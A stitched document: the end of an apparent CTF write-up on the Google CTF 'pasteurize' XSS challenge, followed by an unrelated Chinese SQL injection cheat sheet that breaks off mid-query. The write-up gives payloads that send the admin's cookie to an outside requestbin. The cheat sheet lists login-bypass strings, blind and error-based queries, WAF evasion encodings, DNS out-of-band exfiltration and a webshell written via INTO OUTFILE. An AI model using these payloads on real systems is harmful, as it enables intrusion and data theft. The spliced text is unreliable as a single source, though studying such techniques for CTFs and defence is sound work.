CAPTCHA_SITE_KEY = process.env.CAPTCHA_SITE_KEY || 'site-key'; const CAPTCHA_SECRET_KEY = process.env.CAPTCHA_SECRET_KEY || 'secret-key'; console.log("Captcha(%s, %s)", CAPTCHA_SECRET_KEY, CAPTCHA_SITE_KEY); const recaptcha = new Recaptcha(CAPTCHA_SITE_KEY, CAPTCHA_SECRET_KEY, { 'hl': 'en', callback: 'captcha_cb' }); /* Choo Choo! */ const app = express(); app.set('view engine', 'ejs'); app.set('strict routing', true); app.use(utils.domains_mw); app.use('/static', express.static('static', { etag: true, maxAge: 300 * 1000, })); /* They say reCAPTCHA needs those. But does it? */ app.use(bodyParser.urlencoded({ extended: true })); /* Just a datastore. I would be surprised if it's fragile. */ class Database { constructor() { this._db = new Datastore({ namespace: 'littlethings' }); } add_note(note_id, content) { const note = { note_id: note_id, owner: 'guest', content: content, public: 1, created: Date.now() } return this._db.save({ key: this._db.key(['Note', note_id]), data: note, excludeFromIndexes: ['content'] }); } async get_note(note_id) { const key = this._db.key(['Note', note_id]); let note; try { note = await this._db.get(key); } catch (e) { console.error(e); return null; } if (!note || note.length < 1) { return null; } note = note[0]; if (note === undefined || note.public !== 1) { return null; } return note; } } const DB = new Database(); /* Who wants a slice? */ const escape_string = unsafe => JSON.stringify(unsafe).slice(1, -1) .replace(/</g, '\\x3C').replace(/>/g, '\\x3E'); /* o/ */ app.get('/', (req, res) => { res.render('index'); }); /* \o/ [x] */ app.post('/', async (req, res) => { const note = req.body.content; if (!note) { return res.status(500).send("Nothing to add"); } if (note.length > 2000) { res.status(500); return res.send("The note is too big"); } const note_id = uuidv4(); try { const result = await DB.add_note(note_id, note); if (!result) { res.status(500); console.error(result); return res.send("Something went wrong..."); } } catch (err) { res.status(500); console.error(err); return res.send("Something went wrong..."); } await utils.sleep(500); return res.redirect(`/${note_id}`); }); /* Make sure to properly escape the note! */ app.get('/:id([a-f0-9\-]{36})', recaptcha.middleware.render, utils.cache_mw, async (req, res) => { const note_id = req.params.id; const note = await DB.get_note(note_id); if (note == null) { return res.status(404).send("Paste not found or access has been denied."); } const unsafe_content = note.content; const safe_content = escape_string(unsafe_content); res.render('note_public', { content: safe_content, id: note_id, captcha: res.recaptcha }); }); /* Share your pastes with TJMike🎤 */ app.post('/report/:id([a-f0-9\-]{36})', recaptcha.middleware.verify, (req, res) => { const id = req.params.id; /* No robots please! */ if (req.recaptcha.error) { console.error(req.recaptcha.error); return res.redirect(`/${id}?msg=Something+wrong+with+Captcha+:(`); } /* Make TJMike visit the paste */ utils.visit(id, req); res.redirect(`/${id}?msg=TJMike🎤+will+appreciate+your+paste+shortly.`); }); /* This is my source I was telling you about! */ app.get('/source', (req, res) => { res.set("Content-type", "text/plain; charset=utf-8"); res.sendFile(__filename); }); /* Let it begin! */ const PORT = process.env.PORT || 8080; app.listen(PORT, () => { console.log(`App listening on port ${PORT}`); console.log('Press Ctrl+C to quit.'); }); module.exports = app; ``` Let's follow the flow. When the user posts a note, it is handled by `app.post('/')` which generated a UUID and saves it in the DB as-is. The user is then redirected to the note's page, where the request is handled by `app.get('/:id([a-f0-9\-]{36})')` and the note is fetched from the DB, escaped, and returned to the user. The application has two layers of processing the raw note. At first, the server side performs some escaping by using: ```javascript const escape_string = unsafe => JSON.stringify(unsafe).slice(1, -1) .replace(/</g, '\\x3C').replace(/>/g, '\\x3E'); // ... const unsafe_content = note.content; const safe_content = escape_string(unsafe_content); ``` Then, the client side takes the note, sanitizes it via `DOMPurify` and pushes it as HTML to the appropriate `div`. ```javascript const note = "Test"; const note_el = document.getElementById('note-content'); const clean = DOMPurify.sanitize(note); note_el.innerHTML = clean; ``` The real problem here is bypassing [DOMPurify](https://github.com/cure53/DOMPurify): > DOMPurify sanitizes HTML and prevents XSS attacks. You can feed DOMPurify with string full of dirty HTML and it will return a string (unless configured otherwise) with clean HTML. DOMPurify will strip out everything that contains dangerous HTML and thereby prevent XSS attacks and other nastiness. The application uses the latest version of the library, with no known vulnerabilities, and therefore this seems like a dead-end. DOMPurify is able to strip any malicious content that we throw at it. ``` >>> DOMPurify.sanitize("<img src='x'>") "<img src=\"x\">" >>> DOMPurify.sanitize("<img src='x' onerror='alert(1)'>") "<img src=\"x\">" ``` So if that's not the way to go, what else is left? The IDs are generated by the server side application and the user can't control them, so that's a dead-end too. But what about this line over here: ```javascript const note = "Test"; ``` This is how the server side transfers the note to the client side - it creates a Javascript snippet with the note content in the HTML page it sends to the client. This happens before DOMPurify is called (in fact, the contents of this variable is what's sent to DOMPurify). So if we're able to somehow manipulate this variable, maybe we can escape the sanitization. Let's first try to send something like: ``` "; alert(1); // ``` Hoping that the final result will be: ```javascript const note = ""; alert(1); //"; ``` However, if we send this: ```console root@kali:/media/sf_CTFs/google/pasteurize# curl 'https://pasteurize.web.ctfcompetition.com/' -s -L -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'content="; alert(1); //' | grep "const note " const note = "\"; alert(1); //"; ``` We see that the quote is escaped, and we are unable to break out of the string. However, not all is lost yet. Luckily, the application defined the following configuration for the sake of the CAPTCHA: ```javascript /* They say reCAPTCHA needs those. But does it? */ app.use(bodyParser.urlencoded({ extended: true })); ``` What does this mean? Let's check the [documentation](https://github.com/expressjs/body-parser): > The extended option allows to choose between parsing the URL-encoded data with the querystring library (when false) or the qs library (when true). The "extended" syntax allows for rich objects and arrays to be encoded into the URL-encoded format, allowing for a JSON-like experience with URL-encoded. For more information, please see the [qs library](https://www.npmjs.com/package/qs#readme). If we follow the link, we get an example: ```javascript /* qs allows you to create nested objects within your query strings, by surrounding the name of sub-keys with square brackets []. For example, the string 'foo[bar]=baz' converts to: */ assert.deepEqual(qs.parse('foo[bar]=baz'), { foo: { bar: 'baz' } }); ``` Let's try that: ```console root@kali:/media/sf_CTFs/google/pasteurize# curl 'https://pasteurize.web.ctfcompetition.com/' -s -L -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'content[foo]=baz' | grep "const note " const note = ""foo":"baz""; ``` This definitely looks like something we can work with! Let's try something a bit more complicated: ```console root@kali:/media/sf_CTFs/google/pasteurize# curl 'https://pasteurize.web.ctfcompetition.com/' -s -L -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'content[;foo//]=baz' | grep "const note " const note = "";foo//":"baz""; ``` Bingo, we escaped the quotes. All that's left is to enter a Javascript expression that will steal the Admin's cookie, and report the post. ```console root@kali:/media/sf_CTFs/google/pasteurize# curl 'https://pasteurize.web.ctfcompetition.com/' -s -L -H 'Content-Type: application/x-www-form-urlencoded' --data "content[; fetch('https://enktailvzebp.x.pipedr eam.net/?cookie='.concat(btoa(document.cookie))); //]=baz" | grep "const note" const note = ""; fetch('https://enktailvzebp.x.pipedream.net/?cookie='.concat(btoa(document.cookie))); //":"baz""; const note_id = "a6e8c8bf-49ae-48a5-a0b3-edd299a4c368"; ``` A few seconds after reporting the post, we get a hit in our requestbin, containing the flag: ``` /?cookie=c2VjcmV0PUNURntFeHByZXNzX3QwX1RyMHVibDNzfQ== ``` Decoded: ```console root@kali:/media/sf_CTFs/google/pasteurize# echo c2VjcmV0PUNURntFeHByZXNzX3QwX1RyMHVibDNzfQ== | base64 -d secret=CTF{Express_t0_Tr0ubl3s} ``` ## Appendix A: Other ways to send the request It might be a bit more convenient to use the browser's Javascript Console to send the request. JQuery knows how to serialize an object automatically: ```javascript $.ajax({ url: '/', type: 'POST', data: {"content": { '; fetch(\'https://enktailvzebp.x.pipedream.net/?cookie=\' + btoa(document.cookie)); //': 'baz'}}, complete: function (response) { console.log(response.responseText) } }); ``` `fetch` on the other hand, does not: ```javascript await fetch("https://pasteurize.web.ctfcompetition.com/", { "credentials": "omit", "headers": { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", }, "referrer": "https://pasteurize.web.ctfcompetition.com/1c36eaaa-35d0-4dda-ba70-fd7263bf2fe0", "body": "content%5B%3B+fetch('https%3A%2F%2Fenktailvzebp.x.pipedream.net%2F%3Fcookie%3D'+%2B+btoa(document.cookie))%3B+%2F%2F%5D=baz", "method": "POST", "mode": "cors" }); // or data = {"content": { '; fetch(\'https://enktailvzebp.x.pipedream.net/?cookie=\' + btoa(document.cookie)); //': 'baz'}}; searchParams = new URLSearchParams(); for (const prop in data) { searchParams.set(prop, data[prop]); } await fetch("https://pasteurize.web.ctfcompetition.com/", { "credentials": "omit", "headers": { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", }, "referrer": "https://pasteurize.web.ctfcompetition.com/1c36eaaa-35d0-4dda-ba70-fd7263bf2fe0", "body": searchParams, "method": "POST", "mode": "cors" }); ```
sec-knowleage
# SQLi --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 大纲 * [注入检测](#注入检测) * [MySQL](#mysql) * [MSSQL](#mssql) * [Oracle](#oracle) * H2 database * [BigQuery](#bigquery) * [SQLite](#sqlite) --- **描述** 注入攻击的本质,是程序把用户输入的数据当做代码执行。这里有两个关键条件,第一是用户能够控制输入;第二是用户输入的数据被拼接到要执行的代码中从而被执行。sql 注入漏洞则是程序将用户输入数据拼接到了 sql 语句中,从而攻击者即可构造、改变 sql 语义从而进行攻击。 **教程** - [SQL 注入 - CTF Wiki](https://ctf-wiki.github.io/ctf-wiki/web/sqli/) - [Beyond SQLi: Obfuscate and Bypass](https://www.exploit-db.com/papers/17934) - [ning1022/SQLInjectionWiki](https://github.com/ning1022/SQLInjectionWiki/) **payload** - [trietptm/SQL-Injection-Payloads](https://github.com/trietptm/SQL-Injection-Payloads) - [payloadbox/sql-injection-payload-list](https://github.com/payloadbox/sql-injection-payload-list) **在线 SQLi 测试** - http://demo.testfire.net/ - https://juice-shop.herokuapp.com/#/search - https://sqlchop.chaitin.cn/demo/ **相关工具** - sqlmap - [sqlmap 笔记](../../../安全工具/Sqlmap.md) **提权工具** - [SafeGroceryStore/MDUT](https://github.com/SafeGroceryStore/MDUT) - 数据库跨平台利用工具 - [Ryze-T/Sylas](https://github.com/Ryze-T/Sylas) - 数据库综合利用工具 - https://paper.seebug.org/1836/ --- **SQL 注入常规利用思路** ``` 1. 寻找注入点,可以通过 web 扫描工具实现 2. 通过注入点,尝试获得关于连接数据库用户名、数据库名称、连接数据库用户权限、操作系统信息、数据库版本等相关信息. 3. 猜解关键数据库表及其重要字段与内容(常见如存放管理员账户的表名、字段名等信息) 4. 可以通过获得的用户信息,寻找后台登录. 5. 利用后台或了解的进一步信息,上传 webshell 或向数据库写入一句话木马,以进一步提权,直到拿到服务器权限. ``` **注入的分类** - 基于响应类型 - 报错 - 联合查询 - 堆叠注入 - 盲注 - 基于布尔 - 基于时间 - 基于数据类型 - 字符型 - 数字型 - 搜索型 - 基于语句类型 - 查询型 - 插入型 - 删除型 - 基于程度和顺序 - 一阶注入 : 指输入的注入语句对 WEB 直接产生了影响,出现了结果; - 二阶注入 : 类似存储型 XSS,是指输入提交的语句,无法直接对 WEB 应用程序产生影响,通过其它的辅助间接的对 WEB 产生危害,这样的就被称为是二阶注入. - 基于注入点的位置 - 通过用户输入的表单域的注入 - 通过 cookie 注入 - 通过服务器变量注入 : 例如基于头部信息的注入 --- ## 注入检测 可以通过多种方式检测注入。其中最简单的方法是在各种参数后添加 `'` 或 `"` 从而得到一个从 Web 服务器返回的数据库报错信息。 **找注入点** - GET - HTTP Request 在常见的 HTTP GET 请求(以及大多数请求类型)中,有一些常见的注入点。例如:网址参数(下面的请求的 id),Cookie,host 以及任何自定义 headers 信息。然而,HTTP 请求中的任何内容都可能容易受到 SQL 注入的攻击。 ``` GET /?id=homePage HTTP/1.1 <-----注入点 Host: www.xxx.com Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 X-Server-Name: xxxx <-----注入点 Cookie: user=xxxxx; <-----注入点 ``` - POST - Form Data 在具有 Content-Type 为 application/x-www-form-urlencoded 的标准 HTTP POST 请求中,注入将类似于 GET 请求中的 URL 参数。它们位 于HTTP 头信息下方,但仍可以用相同的方式进行利用。 ``` POST / HTTP/1.1 Host: xxx.com Content-Type: application/x-www-form-urlencoded Content-Length: 39 username=xxx&email=xxx@xxx.com <-----注入点 ``` - POST - JSON 在具有 Content-Type 为 application/json 的标准 HTTP POST 请求中,注入通常是 JSON{"key":"value"} 对的值。该值也可以是数组或对象。虽然符号是不同的,但值可以像所有其他参数一样注入。(提示:尝试使用 `'`,但要确保 JSON 使用双引号,否则可能会破坏请求格式。) ``` POST / HTTP/1.1 Host: xxx.com Content-Type: application/json Content-Length: 56 { "username":"xxx", <-----注入点 "email":"xxx@xxx.com" <-----注入点 } ``` - POST - XML 在具有 Content-Type 为 application/xml 的标准 HTTP POST 请求中,注入通常在一个内部。虽然符号是不同的,但值可以像所有其他参数一样注入。(提示:尝试使用 `'`) ``` POST / HTTP/1.1 Host: xxx.com Content-Type: application/xml Content-Length: 79 <root> <username>xxxxx</username> <-----注入点 <email>xxx@xxx.com</email> <-----注入点 </root> ``` **检测注入** 通过在应用程序中触发错误和布尔逻辑,可以最轻松地检测易受攻击的参数。提供格式错误的查询将触发错误,并且使用各种布尔逻辑语句发送有效查询将触发来自Web服务器的不同响应。 > 注:True 或 False 语句应通过 HTTP 状态码或 HTML 内容返回不同的响应。如果这些响应与查询的 True/False 性质一致,则表示存在注入。 - 万能密码 ``` admin' -- admin' # admin'/* ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1-- ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1-- ``` - 逻辑测试 - 1.php?id=1 or 1=1 -- true - 1.php?id=1' or 1=1 -- true - 1.php?id=1" or 1=1 -- true - 1.php?id=1 and 1=2 -- false - 1.php?id=1-false - 1.php?id=1-true - 算术 - 1.php?id=1/1 -- true - 1.php?id=1/0 -- false - 基于盲注 - 基于错误 **判断数据库类型** - 注释符判断 `/*` 是 MySQL 中的注释符,返回错误说明该注入点不是 MySQL,继续提交如下查询字符:`-` 是 Oracle 和 MSSQL 支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:;是子句查询标识符,Oracle 不支持多行查询,因此如果返回错误,则说明很可能是 Oracle 数据库。 - 函数判断 `and (select count()from MSysAccessObjects)>0` 返回正常说明是 access 数据库, `and (select count()from sysobjects)>0` 返回正常说明是 mssql 数据库 `and length(user())>10` 返回正常说明是 Mysql Oracle 可以根据 from dual 虚拟库判断 --- ## MYSQL **靶场** - https://github.com/Audi-1/sqli-labs - [sqli-labs](../靶场/sqli-labs-WalkThrough.md) **相关文章** - [Mysql注入-Bypass啊理芸](https://mp.weixin.qq.com/s/0gjgPz2QfNC0Y6_AL6JV_Q) - [SQL注入-bypass A某Yun的tamper](https://mp.weixin.qq.com/s/vjbQT41O4MSPoZY9fej_cw) - [SQL注入之利用DNSlog外带盲注回显](https://blog.csdn.net/u014029795/article/details/105214129) - [mysql写shell的一点总结](https://v0w.top/2020/03/14/mysql-getshell/) - [MySql慢查询日志GetShell](https://www.t00ls.cc/articles-52118.html) - [MySql报错注入-高版本json函数报错](https://mp.weixin.qq.com/s/g0wwDcxrcOYXs-lYTrc8Cw) **资源** - [aleenzz/MSSQL_SQL_BYPASS_WIKI](https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI) **监控工具** - [TheKingOfDuck/MySQLMonitor](https://github.com/TheKingOfDuck/MySQLMonitor) - MySQL 实时监控工具(代码审计/黑盒/白盒审计辅助工具) ``` java -jar MySQLMonitor.jar -h 127.0.0.1 -user test -pass test ``` - [cw1997/MySQL-Monitor](https://github.com/cw1997/MySQL-Monitor) - MySQL服务器执行SQL记录实时监控(WEB版本) ### MySQL 基础 - [MySQL](../../../../Integrated/数据库/笔记/MySQL.md) **注释** ```sql # 注释内容,表示单行注释 -- 注意--后面有一个空格 /* */ 多行注释 ``` **数据库名** ```sql SELECT database(); SELECT schema_name FROM information_schema.schemata; ``` **表名** ```sql SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql'; -- union 查询 --MySQL 4版本时用version=9,MySQL 5版本时用version=10 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* 列出当前数据库中的表 */ UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database(); /* 列出所有用户自定义数据库中的表 */ -- 盲注 AND select SUBSTR(table_name,1,1) from information_schema.tables where table_schema=database() > 'A' -- 报错 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1))); -- 在5.1.5版本中成功。 ``` **列名** ```sql -- union 查询 UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename' -- 盲注 AND select substr((select column_name from information_schema.columns where table_schema=database() and table_name = 'tablename' limit 0,1),1,1) > 'A' -- 报错 -- 在5.1.5版本中成功 AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1) -- MySQL 5.1版本修复了 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1))); -- 利用 PROCEDURE ANALYSE() -- 这个需要 web 展示页面有你所注入查询的一个字段 -- 获得第一个段名 SELECT username, permission FROM Users WHERE id = 1; 1 PROCEDURE ANALYSE() -- 获得第二个段名 1 LIMIT 1,1 PROCEDURE ANALYSE() -- 获得第三个段名 1 LIMIT 2,1 PROCEDURE ANALYSE() ``` **根据列名查询所在的表** ```sql -- 查询字段名为 username 的表 SELECT table_name FROM information_schema.columns WHERE column_name = 'username'; -- 查询字段名中包含 username 的表 SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%'; ``` **条件语句** ```sql SELECT IF(1=1, true, false); SELECT CASE WHEN 1=1 THEN true ELSE false END; ``` **延时函数** ```sql SELECT sleep(3) UNION SELECT If(ascii(substr(database(),1,1))>115,0,sleep(5)) SELECT BENCHMARK(100000,SHA1('true')) UNION SELECT IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false) ``` **order by 后的注入** 简单判断 ``` order=1%20and(select%20if(mid(user(),1,4)=%22root%22,sleep(0.01),123)) ``` order by 由于是排序语句,所以可以利用条件语句做判断,根据返回的排序结果不同判断条件的真假。一般带有 order 或者 order by 的变量很可能是这种注入,在知道一个字段的时候可以采用如下方式注入: ```sql http://www.test.com/list.php?order=vote -- 根据 vote 字段排序。找到投票数最大的票数 num 然后构造以下链接: http://www.test.com/list.php?order=abs(vote-(length(user())>0)*num)+asc -- 看排序是否变化。还有一种方法不需要知道任何字段信息,使用 rand 函数: http://www.test.com/list.php?order=rand(true) http://www.test.com/list.php?order=rand(false) -- 以上两个会返回不同的排序,判断表名中第一个字符是否小于 128 的语句如下: http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128)) ``` **宽字节注入** 国内最常使用的 GBK 编码,这种方式主要是绕过 addslashes 等对特殊字符进行转移的绕过。反斜杠 \ 的十六进制为 %5c,在你输入 %bf%27 时,函数遇到单引号自动转移加入 \,此时变为 %bf%5c%27,%bf%5c 在 GBK 中变为一个宽字符「縗」。%bf 那个位置可以是 %81-%fe 中间的任何字符。不止在 SQL 注入中,宽字符注入在很多地方都可以应用。 **oob** ```sql select load_file('\\\\test.xxx.ceye.io\\abc'); select load_file(concat('\\\\',(select hex(database()),'.xxx.ceye.io\\abc')); /* UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器.。UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。UNC路径就是类似\softer这样的形式的网络路径 格式: \servername\sharename ,其中 servername 是服务器名,sharename 是共享资源的名称。 目录或文件的 UNC 名称可以包括共享名称下的目录路径,格式为:\servername\sharename\directory\filename 上面的 payload 中 \\\\ 转义后即为 \\ select hex(database()) 为需要的查询语句,用 hex() 是因为构造 UNC 时不能有特殊符号,转化一下更好用。 .xxx.ceye.io\\abc 转义后就变成了 .xxx.ceye.io\abc 拼接起来后就成了 \\xxx.ceye.io\abc 完全符合 UNC 的路径标准,解析后在 DNSlog 平台就能看到数据了。 Linux 没有 UNC 路径,所以当处于 Linux 系统时,不能使用该方式获取数据 /* ``` 如果不成功,可能是访问 oob 域名的流量被拦截了,也可能是由于没开启文件导入导出 ```sql show global variables like '%secure%'; -- 如果secure_file_priv的值为null,则没开启;如果为空,则开启;如果为目录,则说明只能在该目录下操作。 -- 通过设置my.ini来配置 ``` **文件导出** ```sql select '<? phpinfo(); ?>' into outfile 'D:/shell.php'; ``` ### 正则表达式攻击 在 MYSQL 5+ 中 information_schema 库中存储了所有的库名,表名以及字段名信息。 1. 判断第一个表名的第一个字符是否是 a-z 中的字符,其中 blind_sqli 是假设已知的库名。 > 注:正则表达式中 `^[a-z]` 表示字符串中开始字符是在 a-z 范围内 ```sql 1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /* ``` 2. 判断第一个字符是否是 a-n 中的字符 ```sql 1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/* ``` 3. 确定该字符为 n ```sql 1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n[a-z]' LIMIT 0,1) /* ``` 4. 表达式的更换如下 ```sql expression like this: '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE ``` 这时说明表名为 news ,要验证是否是该表名 正则表达式为 `'^news$'`,但是没这必要 直接判断 table_name = 'news' 即可。 5. 接下来猜解其它表了 regexp 匹配的时候会在所有的项都进行匹配。例如:security 数据库的表有多个,users,email 等 ```sql select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^u[a-z]' limit 0,1); -- 是正确的 select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1); -- 是正确的 select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^em[a-z]' limit 0,1); -- 是正确的 select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 1,1); -- 不正确 select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^em[a-z]' limit 1,1); -- 不正确 ``` 实验表名:在 limit 0,1 下,regexp 会匹配所有的项。我们在使用 regexp 时,要注意有可能有多个项,同时要一个个字符去爆破。类似于上述第一条和第二条。而 limit 0,1 对于 where table_schema='security' limit 0,1 来说 table_schema='security' 已经起到了限定作用了,limit 有没有已经不重要了。 ### bypass 技巧 **常见的绕过技巧** ``` # 双写 ❌ select ✔ seselectlect # 大小写 ❌ select ✔ SElect # 负数 ❌ ?id=1 ANd 1=1 ✔ ?id=1 ANd -1=-1 # 小数点 ❌ WHERE id= '1' ✔ WHERE id= '1.0test' # +号连接绕过 ❌ ?id=1 ANd 1=1 ✔ ?id=1+and+1=1 ✔ ?id=1+union+select+1+2 # 无闭合 ❌ ?id=1 and 1=1 ✔ ?id=1 --+/*%0aand 1=1 --+*/ # 有闭合 ❌ ?id=1 and 1=1 ✔ ?id=1 --+/*%0a'and 1=1 --+ --+*/ ✔ ?id=1 --+/*%0aand 1=1 --+*/ ✔ ?id=1 --+/*%0a'and 1=1 --+ --+* # %09、%0a、%0b、%0c、%0d、%a0 替换 %20 ❌ and false union select 1,2,......,31-- ✔ and%0afalse%0aunion%0aselect%0a1,2,......,31--+ # URL 编码 ❌ ?id=1 union select pass from admin limit 1 ✔ 1%20union%20select%20pass%20from%20admin%20limit%201 ❌ ?id=1 or 1 ✔ ?id=1%27or%271 #字符型注入 ✔ ?id=1%20or%201 #数字型注入 ``` **函数替换** - 连接 ```sql and length(database())=7 && length(database())=7 %26%26 length(database())=7 HAVING length(database())=7 or 1=1 || 1=1 %7C%7C 1=1 %7C%7C 1 LIKE 1 ``` - benchmark 代替 sleep ```sql id=1 and if(ascii(substring((database()),1,1))=115,(select benchmark(1000000,md5(0x41))),1) --+ ``` - 字符串截取函数 ```sql Mid(version(),1,1) Substr(version(),1,1) Substring(version(),1,1) Lpad(version(),1,1) Rpad(version(),1,1) Left(version(),1) reverse(right(reverse(version()),1)) ``` - 字符串连接函数 ```sql concat(version(),'|',user()); concat_ws('|',1,2,3) ``` - 字符转换/编码 ``` Char(49) Hex(‘a’) Unhex(61) Ascii(1) ``` **函数与括号之间** ``` # 函数与括号之间可添加空格、换行、注释 ❌ select version() ✔ select version () ✔ select version/**/() ✔ select version #123 () ``` **执行语句之间** ``` # 执行语句之间的空格,可用注释符、"换行%0a"替换 ❌ select version() ✔ select/**/version() ✔ select#123 version() ✔ select-- 123 version() ``` **括号包裹** ``` # 逻辑判断式1>1、'a'='b',from后的表格名,select语句,可用括号包裹 ✔ select * from (test) ✔ select * from (test) where (id=1) ✔ select * from (test) where (id=1) union (select * from (test) where (id=2)); ``` **省略空格** ``` # 单双引号'"、括号()、反单引号``、星号*、与语句之间可以没有空格 ✔ select*from(test) ✔ select*from(test)where(id=1) ✔ select*from(test)where(id=1)union(select*from(test)where(id=2)); ``` **注释配合换行符** ``` # order by 1 ❌ ?id=1'order by id# ✔ ?id=1%27order%20by%20id%23 ✔ ?id=1%27order%23/*%99%0aby%23/*%99%0a4%23 ✔ ?id=1%20order%23/*%99%0aby%23/*%99%0aid%23 ✔ ?id=1%20order%23/*%99%0aby%23/*%99%0a4%23 # union select x from x ❌ ?id=union select ✔ ?id=union%23/*%99%0aselect ✔ ?id=union--%20%0d%0a%23/*%99%0aselect ✔ ?id=union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aa,2,asd ✔ ?id=union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0a1,id,3%20from%20users ✔ ?id=1%27union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0a1,id,3%20from%20users%23%27 ✔ ?id=1%20union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0a1,id,3%20from%20users%23 ✔ ?id=1%27union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0a1,%23/*%99%0auser(),3%20from%20users%23 # load_file() # 规避常规的 dnslog 站点, 最好自建 dnslog 服务 ❌ ?id=1'union select load_file("//123.xxx.com/abc")# ✔ ?id=1%27union--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%22//123.xxx.com/abc%22)%23 ✔ ?id=1%27%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%22//123.xxx.cn/abc%22))%23 ✔ ?id=1%27%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%23/./%23/*%99%0a))%23 ✔ ?id=1%27%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%23/./%23/*%99%0d%0aconcat(%27//%27,(%23%0aselect%23/*%99%0a111),%27.123.text.com/abc%27)))%23 ✔ ?id=1%20%26%26(--%20%0d%0a%23/*%99%0aselect--%20%0d%0a%23/*%99%0aload_file(%23/./%23/*%99%0d%0aconcat(%27//%27,(%23%0aselect%23/*%99%0a111),%27.123.text.com/abc%27)))%23 # concat() ❌ ?id=concat('//',(select 123),".123.test.com/abc") ✔ ?id=concat(%27//%27,(select%23/*%99%0a123),%22.123.test.com/abc%22) # updatexml() ❌ ?id=updatexml(1,1,1) ✔ ?id=updatexml%23/*%99%0a(1,1,1) ✔ ?id=1%27and%20updatexml%23/*%99%0a(1,1,1)%23%27 ✔ ?id=1%20and%20updatexml%23/*%99%0a(1,1,1) ❌ ?id=updatexml(0,(select a),'a)') ✔ ?id=updatexml%23/*%99%0d%0a(0,(%23/*%99%0d%0aselect%0aa),%27a)%27) ✔ ?id=1%27%26%26updatexml%23/*%99%0d%0a(0,(%23%0aselect%23/*%99%0a111),%27a)%27)%23 ✔ ?id=1%20and%20updatexml%23/*%99%0d%0a(0,(%23%0aselect%23/*%99%0a111),%27a)%27)%23 ?id=1' and updatexml(0,concat#concat)('//~',(select 123),0x7e),'a)')# ?id=1%27%26%26updatexml%23/*%99%0d%0a(0,concat%0a%23concat)%0d%0a(%27//~%27,(select%23/*%99%0a123),0x7e),%27a)%27)%23 ?id=1%20and%20updatexml%23/*%99%0d%0a(0,concat%0a%23concat)%0d%0a(%27//~%27,(select%23/*%99%0a123),0x7e),%27a)%27)%23 ``` **绕过引号限制** ```sql -- hex 编码 SELECT * FROM Users WHERE username = 0x61646D696E -- char() 函数 SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 